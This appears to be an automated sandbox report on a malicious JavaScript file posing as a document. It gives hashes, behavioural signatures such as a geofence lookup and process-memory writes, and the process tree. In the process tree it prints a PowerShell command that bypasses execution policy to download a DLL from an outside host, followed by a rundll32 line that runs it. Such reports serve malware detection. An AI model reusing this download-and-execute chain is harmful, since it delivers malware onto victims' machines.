Analysis
-
max time kernel
972s -
max time network
974s -
platform
windows10-2004_x64 -
resource
win10v2004-20230621-en -
resource tags
arch:x64arch:x86image:win10v2004-20230621-enlocale:en-usos:windows10-2004-x64system -
submitted
26-06-2023 15:36
Static task
static1
Behavioral task
behavioral1
Sample
June26th_Document_2023.js
Resource
win7-20230621-en
Behavioral task
behavioral2
Sample
June26th_Document_2023.js
Resource
win10v2004-20230621-en
General
-
Target
June26th_Document_2023.js
-
Size
873KB
-
MD5
54187639d9027e6c3040367bcd69141a
-
SHA1
85d1274413c026b102dd6e6ddddea6ab8a399c00
-
SHA256
58d23b1de893e0fed73b8dcb80fcb2f5eb14359970ac35cc4ef0582dd1889134
-
SHA512
ebef7df4649b83dc34e9004a764a2995d7a5ffecdaed43c0b93bbb20302083260211373561861eb44d14f28986a97315c3ab23b8332e61f410ed049bc536736e
-
SSDEEP
24576:Vz1cgkPL8Kon29iRvE0azoX4Cpb2FiFRoxfhqAq8hPXJI9a:h1cgkPL8Kon29iRvE0azoX4HFiFRoxf3
Malware Config
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 7 3008 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2890635272-812199704-3564780063-1000\Control Panel\International\Geo\Nation wscript.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 3008 powershell.exe 3008 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 3008 powershell.exe -
Suspicious use of WriteProcessMemory 2 IoCs
description pid Process procid_target PID 4344 wrote to memory of 3008 4344 wscript.exe 83 PID 4344 wrote to memory of 3008 4344 wscript.exe 83 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\June26th_Document_2023.js1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:4344 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Invoke-WebRequest https://prodrepbox.com/images/viewforum.php?thread=2547 -OutFile C:\Users\Admin\AppData\Local\Temp\7EC5BA-BE5D-A4D029-9A4E89BCA4F0\geniuskb.dll2⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3008
-
-
C:\Windows\system32\rundll32.EXEC:\Windows\system32\rundll32.EXE C:\Users\Admin\AppData\Local\Temp\7EC5BA-BE5D-A4D029-9A4E89BCA4F0\geniuskb.dll vcab /k vanil3571⤵PID:4032
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
83B
MD5080e240e1b54ff9c77e558e6e4cfc95c
SHA17ddec98966ae0734f743f319c37586d33294d8cb
SHA2562915fa731488fc4e621302923c06e6ca01dddd93da68948d14a16764214b08c8
SHA512cf2d1ea1f20d4f0a4fde0373495523a03a25f2c8babaafed0d218c9e9e9f38d8a12ce5b37e2428028386b416404a215c5d23e9f21c2447dabc5930835030cd77
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82